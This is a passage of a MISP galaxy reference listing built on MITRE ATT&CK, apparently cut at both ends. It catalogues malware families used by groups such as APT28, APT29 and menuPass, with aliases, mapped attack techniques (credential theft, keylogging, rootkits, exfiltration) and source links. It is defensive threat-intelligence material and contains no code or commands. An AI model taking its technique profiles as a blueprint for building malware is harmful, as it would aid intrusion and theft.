uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

Table 4851. Table References
Links
https://attack.mitre.org/software/S0351
https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

HIDEDRV - S0135

[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)

The tag is: misp-galaxy:mitre-malware="HIDEDRV - S0135"

HIDEDRV - S0135 is also known as:

HIDEDRV

View relationships graph

HIDEDRV - S0135 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 4852. Table References
Links
https://attack.mitre.org/software/S0135
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf

LiteDuke - S0513

[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="LiteDuke - S0513"

LiteDuke - S0513 is also known as:

LiteDuke

View relationships graph

LiteDuke - S0513 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4853. Table References
Links
https://attack.mitre.org/software/S0513
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

DualToy - S0315

[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)

The tag is: misp-galaxy:mitre-malware="DualToy - S0315"

DualToy - S0315 is also known as:

DualToy

View relationships graph

DualToy - S0315 has relationships with:

similar: misp-galaxy:malpedia="DualToy (Android)" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

Table 4854. Table References
Links
https://attack.mitre.org/software/S0315
https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/

Grandoreiro - S0531

[Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)

The tag is: misp-galaxy:mitre-malware="Grandoreiro - S0531"

Grandoreiro - S0531 is also known as:

Grandoreiro

View relationships graph

Grandoreiro - S0531 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 4855. Table References
Links
https://attack.mitre.org/software/S0531
https://securelist.com/the-tetrade-brazilian-banking-malware/97779/
https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

RedLeaves - S0153

[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)

The tag is: misp-galaxy:mitre-malware="RedLeaves - S0153"

RedLeaves - S0153 is also known as:

RedLeaves
BUGJUICE

View relationships graph

RedLeaves - S0153 has relationships with:

similar: misp-galaxy:rat="RedLeaves" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="BUGJUICE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4856. Table References
Links
https://attack.mitre.org/software/S0153
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
https://twitter.com/ItsReallyNick/status/850105140589633536

USBStealer - S0136

[USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)

The tag is: misp-galaxy:mitre-malware="USBStealer - S0136"

USBStealer - S0136 is also known as:

USBStealer
USB Stealer
Win32/USBStealer

View relationships graph

USBStealer - S0136 has relationships with:

similar: misp-galaxy:tool="USBStealer" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 4857. Table References
Links
https://attack.mitre.org/software/S0136
http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

Chaes - S0631

[Chaes](https://attack.mitre.org/software/S0631) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://attack.mitre.org/software/S0631) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.(Citation: Cybereason Chaes Nov 2020)

The tag is: misp-galaxy:mitre-malware="Chaes - S0631"

Chaes - S0631 is also known as:

Chaes

View relationships graph

Chaes - S0631 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 4858. Table References
Links
https://attack.mitre.org/software/S0631
https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf

Janicab - S0163

[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)

The tag is: misp-galaxy:mitre-malware="Janicab - S0163"

Janicab - S0163 is also known as:

Janicab

View relationships graph

Janicab - S0163 has relationships with:

similar: misp-galaxy:tool="Janicab" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 4859. Table References
Links
https://attack.mitre.org/software/S0163

CORESHELL - S0137

[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="CORESHELL - S0137"

CORESHELL - S0137 is also known as:

CORESHELL
Sofacy
SOURFACE

View relationships graph

CORESHELL - S0137 has relationships with:

similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

Table 4860. Table References
Links
https://attack.mitre.org/software/S0137
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

FLIPSIDE - S0173

[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)

The tag is: misp-galaxy:mitre-malware="FLIPSIDE - S0173"

FLIPSIDE - S0173 is also known as:

FLIPSIDE

View relationships graph

FLIPSIDE - S0173 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 4861. Table References
Links
https://attack.mitre.org/software/S0173
https://www.youtube.com/watch?v=fevGZs0EQu8

POWERTON - S0371

[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)

The tag is: misp-galaxy:mitre-malware="POWERTON - S0371"

POWERTON - S0371 is also known as:

POWERTON

View relationships graph

POWERTON - S0371 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 4862. Table References
Links
https://attack.mitre.org/software/S0371
https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

Marcher - S0317

[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)

The tag is: misp-galaxy:mitre-malware="Marcher - S0317"

Marcher - S0317 is also known as:

Marcher

View relationships graph

Marcher - S0317 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

Table 4863. Table References
Links
https://attack.mitre.org/software/S0317
https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks

OLDBAIT - S0138

[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="OLDBAIT - S0138"

OLDBAIT - S0138 is also known as:

OLDBAIT
Sasfis

View relationships graph

OLDBAIT - S0138 has relationships with:

similar: misp-galaxy:tool="OLDBAIT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 4864. Table References
Links
https://attack.mitre.org/software/S0138
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

FlawedAmmyy - S0381

[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018)

The tag is: misp-galaxy:mitre-malware="FlawedAmmyy - S0381"

FlawedAmmyy - S0381 is also known as:

FlawedAmmyy

View relationships graph

FlawedAmmyy - S0381 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 4865. Table References
Links
https://attack.mitre.org/software/S0381
https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware

HAWKBALL - S0391

[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)

The tag is: misp-galaxy:mitre-malware="HAWKBALL - S0391"

HAWKBALL - S0391 is also known as:

HAWKBALL

View relationships graph

HAWKBALL - S0391 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
